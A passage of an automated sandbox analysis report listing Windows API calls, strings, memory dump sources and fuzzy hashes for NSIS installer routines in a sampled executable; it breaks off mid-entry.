                                                    • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                    • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                    • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                    Memory Dump Source
                                                     • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                    • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                                    • API String ID: 1033533793-945480824
                                                    • Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                    • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                                    • Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                    • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                                    APIs
                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                      • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                      • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                      • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                      • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                                    • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                    • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                    Strings
                                                    • Exec: command="%s", xrefs: 00402241
                                                    • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                    • Exec: success ("%s"), xrefs: 00402263
                                                    Memory Dump Source
                                                     • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                    • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                    • API String ID: 2014279497-3433828417
                                                    • Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                    • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                                    • Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                    • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                                    APIs
                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                                    • GetMessagePos.USER32 ref: 00404871
                                                    • ScreenToClient.USER32(?,?), ref: 00404889
                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                                    Strings
                                                    Memory Dump Source
                                                     • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: Message$Send$ClientScreen
                                                    • String ID: f
                                                    • API String ID: 41195575-1993550816
                                                    • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                    • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                                    • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                    • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                                    APIs
                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                    • MulDiv.KERNEL32(0000E000,00000064,?), ref: 00403295
                                                    • wsprintfW.USER32 ref: 004032A5
                                                    • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                    Strings
                                                    • verifying installer: %d%%, xrefs: 0040329F
                                                    Memory Dump Source
                                                     • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                    • String ID: verifying installer: %d%%
                                                    • API String ID: 1451636040-82062127
                                                    • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                    • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                                    • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                    • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                                    APIs
                                                    • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                                    • wsprintfW.USER32 ref: 00404457
                                                    • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                                    Strings
                                                    Memory Dump Source
                                                     • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: ItemTextlstrlenwsprintf
                                                    • String ID: %u.%u%s%s$@rD
                                                    • API String ID: 3540041739-1813061909
                                                    • Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                    • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                                    • Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                    • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                                    APIs
                                                    • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                    • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                    • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                    • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                    Strings
                                                    Memory Dump Source
                                                     • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: Char$Next$Prev
                                                    • String ID: *?|<>/":
                                                    • API String ID: 589700163-165019052
                                                    • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                    • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                                    • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                    • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                                    APIs
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                    • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                    • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                    Memory Dump Source
                                                     • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: Close$DeleteEnumOpen
                                                    • String ID:
                                                    • API String ID: 1912718029-0
                                                    • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                    • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                                    • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                    • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                                    APIs
                                                    • GetDlgItem.USER32(?), ref: 004020A3
                                                    • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                    • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                    • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                    • DeleteObject.GDI32(00000000), ref: 004020EE
                                                    Memory Dump Source
                                                     • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                    • String ID:
                                                    • API String ID: 1849352358-0
                                                    • Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                    • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                                    • Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                    • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                                    APIs
                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                    Strings
                                                    Memory Dump Source
                                                     • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Timeout
                                                    • String ID: !
                                                    • API String ID: 1777923405-2657877971
                                                    • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                    • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                                    • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                    • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
APIs
  • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
• RegCloseKey.ADVAPI32(00000000), ref: 0040282E
• RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
Strings
• DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
• DeleteRegKey: "%s\%s", xrefs: 00402843
Memory Dump Source
• Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
Similarity
• API ID: CloseDeleteOpenValuelstrlenwvsprintf
• String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
• API String ID: 1697273262-1764544995
• Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
• Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
• Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
• Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
APIs
• IsWindowVisible.USER32(?), ref: 00404902
• CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
  • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
Memory Dump Source
• Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
Similarity
• API ID: Window$CallMessageProcSendVisible
• String ID: $@rD
• API String ID: 3748168415-881980237
• Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
• Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
• Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
• Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
APIs
  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
  • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
  • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
• lstrlenW.KERNEL32 ref: 004026B4
• lstrlenW.KERNEL32(00000000), ref: 004026C1
• SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
Memory Dump Source
• Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
Similarity
• API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
• String ID: CopyFiles "%s"->"%s"
• API String ID: 2577523808-3778932970
• Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
• Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
• Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
• Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
APIs
Memory Dump Source
• Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
Similarity
• API ID: lstrcatwsprintf
• String ID: %02x%c$...
• API String ID: 3065427908-1057055748
• Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
• Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
• Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
• Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
APIs
• OleInitialize.OLE32(00000000), ref: 00405057
  • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
• OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
Memory Dump Source
• Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
Similarity
• API ID: InitializeMessageSendUninitializelstrlenwvsprintf
• String ID: Section: "%s"$Skipping section: "%s"
• API String ID: 2266616436-4211696005
• Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
• Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
